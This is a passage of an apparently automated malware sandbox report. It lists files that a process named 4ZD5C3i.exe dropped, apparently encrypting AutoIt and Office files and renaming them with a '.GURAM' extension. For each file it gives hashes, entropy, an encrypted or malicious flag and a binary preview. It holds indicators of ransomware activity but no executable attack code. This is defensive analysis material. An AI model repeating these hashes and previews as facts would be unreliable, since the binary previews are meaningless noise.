                                                                                                                                                                                                                                                Preview:.B.W..Z.{.J..>....K}....Z=/.J[*v.._I.........].<.L.I..Y;k....L...T.Op......U.\........y.j/.R..S...0..5p..s.....7..+3E....>. *rP.,.r..].K.N.....3.(....O.........6..!].../6~............'.......t.....l..w.....+..`.?!.ECu....n...+........`q.....q(=8...`5...XA7.r!|./D.;e..5^.....JO..m.....i.X.. ,..^..o...J..w.......Q.(..$l.[.........j.n8A2.>.R.....f..KZ'.@.L.=.O.....A..A&.%.2Lk/.H(.Y..w/-........My~...s7..eM.?._.....1.. .P..n..*..94O.....R..m".V.6.><....)7()@.y0.N.l..f..#.%.BV....M....Bs...k......x...0..LO.F\ZP8..1d.5...hT1.r.G.x)....'S....-n..QVY7...e[.$C...n"...v..q....2.....E...b.........:U.O...1..T.a.%.r..X....6lQG_/\l....Y.SQ.....;.....(....K..*!b.i&>........U9..Q..&.W...|..j......+K=03..{S.b9..`.H$;..E..D..<W8A..C8.#.....B...ZWr..J...<MD...?.D.+..{g..S.'...p,>.....mt....?....j......R\..Jx.[\.n..Z...%TC...M.....Qr>..M..Z........x..l...uD.O8..Q`.d\.o,....}....0......i.......}lK..U....n..la.J..?..Z.G~6..)..z%.#uo..P...H<.!.h].J

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\SciTE\au3.keywords.properties.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):92207
                                                                                                                                                                                                                                                Entropy (8bit):7.998062050405139
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:GEeoD32y0LEkIEutjgG1cmLZw1k5+Owq44GwMkjaXszvo6eylf6J:vbTdiut8+cmLZw1g+Oj4//kja4vogf6J
                                                                                                                                                                                                                                                MD5:69D97702551424BB26E1C80D2BC95282
                                                                                                                                                                                                                                                SHA1:BFB1605ED40D9F6B5EBDDDB6843D8425E900314C
                                                                                                                                                                                                                                                SHA-256:D64EA22C469D75E8F445CD72C73CF2A281D08FCE4C71458B44F32C38F9A1A905
                                                                                                                                                                                                                                                SHA-512:5C5E6C69D9C020F0EA44DAADA07F1972375B82B1541F54C140FAE45F9114029E06DCE3C67EB4D036D647CFF0A0916064CC64DD87C049E9E9536404438D035FAF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6.FcO..lh....X...Y.'w(.'.W.p.\.._.xaP...FR?GXKYR...=......*.J..i...8,.=..0P#....R_....w.=..'.......AK6...a...q....>...H.{...|.K....N.....s..'.y.=..J.....S...z...?j....K..Z..(....f.CE.u7..c..B.ie.P.....k.....W ......I-..{u.."...9J...>_!?..d..97H..I...7e,rf.!Ogp.R.i.0w...XR?...&h...0Q-5.~B.........L.<.qt....#.].v.I...S............K.00....t3.A....j.*X.}..f.......D@....~=..z.,3.d.*.M.8z.6R......`..l.W.S.../....5.&..$mA.RKoO...F.....]....;......~.x%.K2.Sp.P..4..d. ..BI...]*q...L....#...ka.(...B..).20qSTD.Q.gGL....a.>z.c.TP.\7....*.d..c.......g9.~.P...U.@GT.R.i.1..d..^..z..b.'...3.P.w..q9~....;..z....$6R../KX.<..}.. g..yv..F..`.....U.8.9B/i.......U.6..$...bA.....-.^...:....s2.t..o.i'b)......Xzaj...B......IS.,R-.ZI..l.oL.SK1.|.,.@..A....Yt......C...........z.......>..lOe2.mS{:...d..W.W.?..~....g.v."..<0Enf.....X.B..iCsu/c....1L..e.......S1.#.H...p......#.(x..6.n...*..._......~`..*r..V....Nf..<.........9\Sx..^D....{?..(.;.c...F...H..d.sLd

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Uninstall.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):72369
                                                                                                                                                                                                                                                Entropy (8bit):7.997436425283704
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:6bJQiMZYiDiyGa+YqeZjvgT055JgU0pt+XMLr+Ev:EpriWa+uZa0JwpEM+Ev
                                                                                                                                                                                                                                                MD5:70EDFC69B44E40274864C288692168F4
                                                                                                                                                                                                                                                SHA1:83CCAEDDC6E9540F07341C0655251508B7D4BC1D
                                                                                                                                                                                                                                                SHA-256:59707DD77489979B430CC8CBDE2A8828ABAE7A233CAF7AD78741B5AAEC8CD3E1
                                                                                                                                                                                                                                                SHA-512:27648DFC28E79910B8454CFC65D1DC179C3A6AB098E533B887C9A4910FD8C65C7DFF1A93874FD5EE0DAF2821026D6A4F8057A95564FAB4E92F1E5A2C7F93855F
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......R..Q=..i"..(xB*G.z..........-P..$.t...m...*s......_1...T...{.C.C...&...L...'".Wd....{y..@.....Y.~.-...|..M....>.......!~J.]...n.....KNP)...n.z...(p..,/.=..f...p.V...?^.E.2..j..H...59.z...&....'=....|2.6.o.O.....W..........'.tku...Nh...=..&...]..a.O.M....g`.I[...(.....5V..Ym....b....i.e..KG...I..A.U.....P...3."..."..A.l.2k|.W.yS.8......8..7..jtw...3j..r".Q.t^/a..=....;.l...qn.+...9}.05.E.+a.N...N...5..ZW.Ne...6...`...=&.?....E.k...?./...........}X..........;@.c.N../.i....R4......X.bn._t..=...j.,TC1w..6.....X..QhQ....$......?X..xj..Xt!.)....O>.J=...V...E$.r.|g4.6b...5@....,...).x...(%...F..8.#Y..V..k.....]....0~2...9.!..3....YR....l."....._A3.N..>e#.. .Z.....cv..@...m..y..c.H.z...2.YW\.B2.U. `.....Z..)j4/......x.a..$!.q.=..L..U?......-.Q..m.V.*{..U..D..t..|=.6.H...,.:..D..d.....FS.....W..O.&w.T5.....F5.B..@.....3.....@.C...Tb..lc.....9.l.`&.....3{.hAm.A.Nb....3..j8...... ...._.C....p....@j..v.a.NF.. .Y\&5....d}.........\.JX...."8A

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\AppXManifest.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5036392
                                                                                                                                                                                                                                                Entropy (8bit):6.33502205419087
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:C1eS5wcaBFRR5VU/3NIptmBnvII3NIhCrM:C1j5v0TDVvcBvI/f
                                                                                                                                                                                                                                                MD5:46E420D32B6AE1F2B14D371150C75723
                                                                                                                                                                                                                                                SHA1:72A086924CA2AE64AD5E22B719B6EC642669D4EA
                                                                                                                                                                                                                                                SHA-256:0BD966B1FEDC7EE9DBFAE07F5C9FCC179A7772B96E21FCCBBEBB8399A509B791
                                                                                                                                                                                                                                                SHA-512:7D00C7079326A00F6DBD4D896A641E48A1D4EC7D9D075690683B2E493C7FFC045C73C50547936B8927DFBA9C0E56D72FEA953E9010402845C090DE838F2B9F28
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T/\.q.`........*`.[........Ou..}.(....E]...Z..#..I)7..=..R=.R.o..Y..`Vy5w.....?o.S...S$.4.;....l..5.G...i.l#.RxD.J.e`.P./.U=P..5.FZ..N.~.s6....EJ.T.}..O3G..S.^.<...Y.g.n.h..6..h.mj..yE..[..".x./..wA.5..R......c.....Ty.=....F`....Z...s..V.."~.8..{o.w.jE(v..V..p@..4...3.uF.*.N9.......qi#.....*....m..6!..H.w.)v.]..p..L..tv-.K...\..B..f.oO.V..............m..<.3!b..3<..F....pm....O..u......dn..EC.%.l).I....R_bhU._...3z.;..|.'..(8..e.........8.l...E$...f.".....s..G.tq"^.#...!.P....T...........7......>..9.H.....m.,...s.U.....K.;.CXB...%.o..}.....0..:6fZ..."5...q..OM+!...g.&...7.e...K.....j.........hu.u..>a.n...]..z.7,..w==...r...i_...]u..........N......... .#.l.~.Daa?.....k..{..V.NF....6...[.q..WH..pD.s.4(.x!..1"(.N...4)..2/....O.3t..1.6u........+)..p+)...L7...";..U.{..\......m.D,#Ni.x7....7..M...^..+H.....t......`..q.`..~...L^6.....0.@.Q.*T.....t..d.8.A:.MY..J..bV...O^uDV...50...:...B;..g...k=y...0..7._.G../...N..~.x....uT..)..]...[.-JA.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\FileSystemMetadata.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):889
                                                                                                                                                                                                                                                Entropy (8bit):7.758746295805241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5vn7pmGc7n+CSjsoh2jmJrc0YXUZtwsTTGrsKn:5fMGc7n+19I4o0jZtw/
                                                                                                                                                                                                                                                MD5:FDD3CEFC3ED4AB9B5BAA4B7C9B7EA857
                                                                                                                                                                                                                                                SHA1:1E411292439EC386387C6CD862EE193D155733B5
                                                                                                                                                                                                                                                SHA-256:A119C4458E6BAAF4050F486F373F79C3E091241BA1BD7C0B2F0145C606CD5371
                                                                                                                                                                                                                                                SHA-512:E67A94506B2E7731111CCE848640D660052335C88695A0EC5E793E307CCF6BA14A76A9E4D2001872DB1C1F260E8362F2205D4D586C8ECECDBEBC2AF6D6D2C31F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:u.w7..+^.C)'...K..A.rO......G. K...]...~iw(P....C.TW`r.Q.>1..z...R.N..k.y......P.=}.s..$.....B.!v...w.e.l..b...wra.).t.....N.(...E....[W:...A0.z..H.........5).3....l."...g..)b..4q........ 5-F.v$.ud.g7.[l._zg?.!..h..4...y.$?..m4...7.L=....m..T.be.uI0....p4AHz.2......&44.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...N'...<...~.pu.oP.n.~f...:&&..g%2R{....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\Office16\OSPP.HTM.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):175136
                                                                                                                                                                                                                                                Entropy (8bit):7.998986525082196
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:o27OeadZJrP0HXs7wr+CT2LqC6v9r6jqHEK+/cqHopJvG5T+KOsYPe2EvmyHmK46:H7OTdZJrPE8ip6WkK+/Cp0T+1sUovmTQ
                                                                                                                                                                                                                                                MD5:3D5860F5406D2756C5EBCECA923B2598
                                                                                                                                                                                                                                                SHA1:2A4970B8241A853B674BC8957DB5774D23088DAA
                                                                                                                                                                                                                                                SHA-256:EBE63DD9917464E16D6F526B42779D2F6B0896F0AC9A6C1BB0F80969BE86FDC8
                                                                                                                                                                                                                                                SHA-512:27BAC35BE04E263566FC5BBBD7E3A69F0B511A96D47FBD61ADCED9A910644F494FD3763094503D4833BCF9F95A7245E1B5FDED27CEADD1A67C0B6DE318682EE2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...89.oY7,Q<.........R..O`G,...MtO.xo[n.../............vW9....ZbY..=..>.l.|.....E..z..'.~:.%@e...-XW.mWi....|...v...p.....#6xd7x.$....)...iy...........UFC...{2.{......X........nKh.4V..B..W.Xi.C.OI5L....@.e^7.>g.........y..!.R.I8.h..|.P.....r.....Yr...f"c.%(....".a..#?-....6.%....b.R.v..Z..o3E.T..x..A..,G..Fd..U.x.z..\s......+$...%..-..=.....bQ...F>..o5.....U..L..:{X.w....R._..]..&..)W\.8.".....T...:k.k..~.:-..U.........@..J'5.....?.O~.m\.D...............~.i..<. .....8..'.._4...u.w.yy...%.!.azuB:..0..L.R..RurtM.^.....Tc{...Fpi....i.*..m/._.f.l..m....<...G.._;.+`..'aTG..Q..}...T;.....=..O...m77.#r..S".rC.d.?G.(.e.16/.E..s[@..DP..b.3...@cE.=s.....N..{...*.hY<....x..wt.?.?.....[...C$.+.,..,........".x.../.......TV"..-S._+..@..&.....p..pD.@.!S.U......W..YUVW..0+.....b.ks.&.....7..P..;..\.S>zs_...%.~..?].S.....C.s...%....2..C....S..|..1 .>.]E.rO...Y..%..CB....V...N...m..{D.f...~I*DP...4......Y..M.. _...P..Sx$Y-..".0E,....Sv.v...{..w.....P+.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\Office16\OSPP.VBS.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107620
                                                                                                                                                                                                                                                Entropy (8bit):7.9982611524763225
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:i2HqXDfClRR7/WwOGirFp1DtKW10SczWo3cvtTA3n1lhAFl:DqWlRR7/WvxvUa0HzQSCl
                                                                                                                                                                                                                                                MD5:62E0747B7FC675658A45E32D7A703A5A
                                                                                                                                                                                                                                                SHA1:1959874142A3A9F21A21E2F517A3793F3EFFEF7E
                                                                                                                                                                                                                                                SHA-256:77D06B2E34D77293425AC34B3713E4A383DCF754C36644DF840EA14FDFB18AA8
                                                                                                                                                                                                                                                SHA-512:10EDB91B4B1D0CDE45B18146988E846D784EEC0DA5C3415F377722BE23C5A190C2839F91015840E039EA56A12CA10C4B5CD918321ABCAD927F44F9C56498913A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*..Q..5>.YNC...s........Yo....G..o5`..(.\Jn.Zr.-.)n.nj....j....^Q...e.4}..Xp....0.H.I...fE.'.,...sY..0...c....w.....o.^.&Y$.=T.i. ..J*...w.-.....?.,<.&..`.E..c.5...(9ja..#..p.......Q.e.....NH#..U1k.H.g.)..*4..!.<.....a...$.a..Fo.1R.E...V?u..#".1....[....+....ry/u........dJv"|.#..4....n...;......Q].g....@...E..).'./.......q3:.U....0..6.*A.dT.[.q..N...C.d)I....@..Q..w._}.6/..<.."..[..N..).m9.F`O=..X.....t..8......[....[........Ivr%Q{Z.f...3 .v./...9.o...:2].....Hr$.[z'..?.><.1.....Y.0.....f..M.|..s.b...GbR..Oz...Fd.+.o_C.|.Z..M..?....W?.ws[........>.p...}...%.h....G...A.(w|....RP...8....Y..|..-..Gq6U..^....U..&..n#...K/.....r....?.u..D.;.1s.....@~WJ+'....."I.....%%Y.L...*......^_...h9...i2.>.)..n.6q.@..K..5..Cy...G...d...Rb........~.".q....n_..+^.2.qU...#"..2..n...t.V. |..#.c....H.?u...T.G..UcU>._.....C....mZcM0...m..R.=t.}..L<................w...8,.^..^.p..........U...uU...2.K5K....Q...HkW6.i.....i<K......;gY.u`......kb-bR......M.7..S...~*A.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\Office16\OSPPREARM.EXE.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):162400
                                                                                                                                                                                                                                                Entropy (8bit):7.99892175784265
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:Mbpu2sdrlZ/ZNm75kwtDIPjUoVDmYtlR0Mqe/M2VU0KgpuvougyXy:Mbp2lNDSkw14BVDRtlR0MnRKDwZ
                                                                                                                                                                                                                                                MD5:D0A75199869DA1F69511D948DB6BD74B
                                                                                                                                                                                                                                                SHA1:56D35DAF6F786B9302AEC723902BC499A003FA98
                                                                                                                                                                                                                                                SHA-256:66EC29C7EEED6014D611B40B85FB7AFF6CA53A82124CB2801D7040573956BD85
                                                                                                                                                                                                                                                SHA-512:AC6E70275F04A90FEE86134A398B3386CB8F42443EC49CD4DFB6E855CEF5EA05F1E6DE3E5BC7B41D9A04C976DF34F02440E63A50902869193BAB6DD1DDCD195C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.:?P..gk.\-.=s....S.6&o.bi..|..P.1.p`{.).q.u..M.C..Q.Y3.}.....y.AN.bMs6F;.*.|.Zj+.8bz.r..W.>.am"i.d..t....k..{K...}W. ......N...9........:.......C.....DS..Gqu3;.T..sT.]..i.|.!I...&{("..C..Q..}L.y..k.....k...zB....b..K:>..B....'.....B..Zn...:?..%.v....[..5.u@._|.xt.....WU..-L..O.b.....)...K/dPr.mF.R..0.....o.X.8T.....y7gr.s5p.h.9;.......D.!.Mp...9F.\....l..|g.Z...J..k.oJ..E@Nb.G.g.....[F..r....u.....z.2...{.'?...ax.;b....).6.RE..o6v/\.[..`....].c...F..Q...!6.....&..'.'.]p.....j....R....u.Q......ba[.Yl..`......H..~.S..M'fi.|TR..6{N...K.Cw.>..~L.y8&......*..T.....sP.....w.....'4.J.m....'B......_.u.T...$..b.1(+5..s.2~.AP ...k.....n..B..[YC.=...;..'...7d....xvw....`dw.,\.Yy ..c.HG.x2.K..d.;X....D.y~..J....?.v....`.L' ...Q&b.j..?bs......"W/..%...8BA/.l^......#.....4.m.......V.k....W.M...P]..V.=..A;....} _..n8|......Z..#..2..Em..q.s..3..#.P.%.h.X].z..........#b?<s,..[.....!.p.M.rp}..4....$...8.Sf..n.by...5...a...(.TH.......tE...E..G...../S...\.5.l..~

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\Office16\SLERROR.XML.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36944
                                                                                                                                                                                                                                                Entropy (8bit):7.994605418058789
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:ML+VVNnBYPDwByXIbCE9yM11q3G/UsHSojnC:rVlQw6iCEgW/UgC
                                                                                                                                                                                                                                                MD5:B83E731F460274D005AA01C18D455D5F
                                                                                                                                                                                                                                                SHA1:A2AC296B41446DDFDDCF68629BB7E97F2B2D8BFE
                                                                                                                                                                                                                                                SHA-256:0B2F9BA33D47790BA0BC25B8AD4F91FC006304A62245CA5A98FDA42159C5B1D3
                                                                                                                                                                                                                                                SHA-512:E7A788091F744772778BE22B36E3E6CDD6288B178587D7981E2F17BC4BB6A7C51CAA4DA4B852BA65029B1A3C9AFAD85D958E0CB9AA6F776C514A9F4146B6A3C3
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Bo.M}.qo...b...zQq.s....P5...]..O....8..9...].i.[.\...:.:},.....{....t.U...`$..........Lm.g..4G...x..[.../...F.o..s6b..D2h.....]-...\e..gDw..7D..`.}.5.....l....b0X....4.F.k..^...kd!!.....t.......N...J+.B#<+L.w5...~bNOV........vj.'....D..G.,....W.R.(tv...KG..[m.WO._.!/.......v..<.D.m..t....#3 .....ok...G. ....#..7..Fuw.Ov~..,K.....[....q8..>UD..xv......~;D..l.+*K..rkMU...E.....(.W.....-.-.7r=~&....#. y<..d\e.W353.7:.A]..V.`L.m.hy..)..H}......IG.!.........9....Vj$.r.m.......b.8".0}..yA,e%...{.....r.....pun...u...1..r.=.B=:.ICE.5Z(.h=......I.....K.x..[s{.G..(.........T../*E.... mq.U..@E.\=..^.A..^.......}..e.s.=b.,......(.6JG.#N(I..d....vVi$R....^.,=.c......'.|n.%....6%)..!B.@.K.Gqp...!.....(%.*..6M.WQmyq.....V..`.c.@U.. *....oK!"O(.........-Z..5.9...Le;.`hz...J.q..,M.NP.g....|2|..?..S.Y...[...'.F)..>.......w"u..v.......G./cH...No.Xh.$..?........[..q.B.8....v......|j.\..)]4i.6s_...d.+vo,.Jr..5`f.x..7..........ZS6:........].W.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0015-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):323201
                                                                                                                                                                                                                                                Entropy (8bit):7.999345432912856
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:RfYoRVcdbEmkTygjLIeL3oiCZkZATeQgdQeakdwk4RFF2q/tKenyVR:ZYagxsnIeroZk2T9gZ7dEborzD
                                                                                                                                                                                                                                                MD5:EA9195C6414615A4F43F28AABC6BBB75
                                                                                                                                                                                                                                                SHA1:E6492FEBA2AE1E12EC708577F3760E7B488ABAE6
                                                                                                                                                                                                                                                SHA-256:09C53125442B3DBA7A5F252D8F7A8CB106E414E3DB9870B572A2B6A1297FC9F2
                                                                                                                                                                                                                                                SHA-512:4F4CED115D387EC1D77C86184AB995465163EF04A3C8D0D3835918A0544CC86B0C1C55D5C7655F241075BAD0C395FE1D3DD0D859677BFA8A7F1970B7D22F948D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...S.XA.<!.r.....z...:{&.......1e.?....k...+C..e3.9..M."8g...u..........Hf.g..p....++.K...I.L.&..d..[.1!L..Z.fF.......qpV..u..A:.n0...`...G./.............l...+..O.s..H.....Ha.h. ....t...qB>...Z.7N.h.Pc^.(487.x..._W..m...u...`*..............K.]A..D..V=y.....I....Ne...9..{n4z!..%.M.5W.)..6......i.....y.|I.].xk.%.ET.S....L.....c^.e}..8.Ae.K.?...6..QS!.......N..A..6.;..(R^.u..c....'.gP.~q6.....:.N..X......._.....X~..Aa~).Tz...$....~O8....O...aO.h...o.......4t..).=....C.;....K...I]....2Aa.P. R..l.@:.'.8.....].R.^0.`..u..K.E....,..rMf................3..^....wEK4Y.A../.i'.6......i".6x;.!G.5....h.Y.0g...2M....f!....H...w9b.\....O......\...8!.h..I.|.~..4...t..w.Q.A....u.C...<......%i.......~..lH..._.i...$X..........:.G..9.4.C[..~.[q.v....+......d...".....C.Jy.l=...e...x.E.YT...K.%...K./~..Z..h.....O..O..J..Nk....f.l.....7.W,l..7.....>T....>C.....S...u....u1.,.ce.d&k........QX.j.%...RX.,..{r!...>..<....i...;..)`..Z..`v.......G..r.Y...*p6

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0015-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2338
                                                                                                                                                                                                                                                Entropy (8bit):7.915379154906691
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:NkIHIDCpcPFv/ubz8JfWACx1MnxyR314/154o0jZtwqBc:NEDCpUEzWWAo2kE16leb
                                                                                                                                                                                                                                                MD5:B5A10096F088DD8E74CDF3D09F674498
                                                                                                                                                                                                                                                SHA1:AE438405A4F1FE4702D524C0664D9950B992FA5E
                                                                                                                                                                                                                                                SHA-256:EE84366CEC34A1AF3AD6CAD189D7D027981858BF20226E4F730305CBE8A69C5B
                                                                                                                                                                                                                                                SHA-512:F0BBC7BBD01CF34227EE8FD670A146661A147F3C7E5F4F0A05921D79DCF7809827451F19853B42AD2F15724D435FB583A2ADEC71229C3417BD120B256DAA7D87
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6S)..`...94.j@>e...\..A..}t.Q;..zgp....`...{.~`4..H....i.Vd...V:t..>#$j.Xc.o....!.0."...g-....w...2..Y...0.....e.u...dC..R..n.0.A.Vd."5.).7*..A,(......d.... V....n.T?..e.-..|<.&|.O<...u)...2...N). .*'(....g...h..E1.4K..v.....X....`OY~..7.Y.......g.#........<Xjj.H.v.1.$.=.....i...@.YX....0......H.Mda..{Rb....-....:-.-.............@v.!......K .a.l.%$>..m.G..........BE@A..XfU..l'.4.V.|...Tx..S....LD...)..<.......C.b.[(i..}@"....nG.n..WxL..`@.f.4.ai.r.kG}...a.,..x..GR..../......P.rui..3.....+..2...Wf.r...0.V}. .R;EZ..A......(4,.."."..Oy,...j.o......U.Q.35R.5..t!.plTH<;...'c.6...<...7~.=.o.)...,......R..m+...v.rA...sY...y..8Fb.R..f.p_..z...L..(0g..Y.d.b>w....R..2..m..1.R.^...lXh.N./......Hl.u.Ml0..x.#.X$...M...6h..-"...1..$s.>.....-....Cz..3...#~.....b{...{....j..#c..Y.\J.C.'.........B0[.'.3.".,n.Y...|(....z...i.(.+...>.f5c%4."S..O.$h.$.......!4.......R.J,..l..\....+.....xR.4.y.7..|..l..t..0.OwV.c.2...W.!..r>..{.{.....uA.c......_.sp<..

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0016-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):802643
                                                                                                                                                                                                                                                Entropy (8bit):6.379234876290679
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:XfUlahP4qAhQhespK0vFM0d5MxuOtRw7q29GpNe+l4VXpcMjbes:8CgFMJAuOrw7wQL5Lj3
                                                                                                                                                                                                                                                MD5:B5605F577E08A6D2C8AEF481284BDC97
                                                                                                                                                                                                                                                SHA1:6EF822F7BE94EC327B35EEDEFE4D67A2429BE521
                                                                                                                                                                                                                                                SHA-256:57F31404C6EABE94950734325445823271463385720E863F0C9083AD9F0524BF
                                                                                                                                                                                                                                                SHA-512:16607004C8359F6FC71CE023BC18A50E87B31CD863564EAF77F7AFF0D7B6B000CCAD131455CCB45403A39AB441F4E0462537EADEE146A00818430B6E489AB7A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
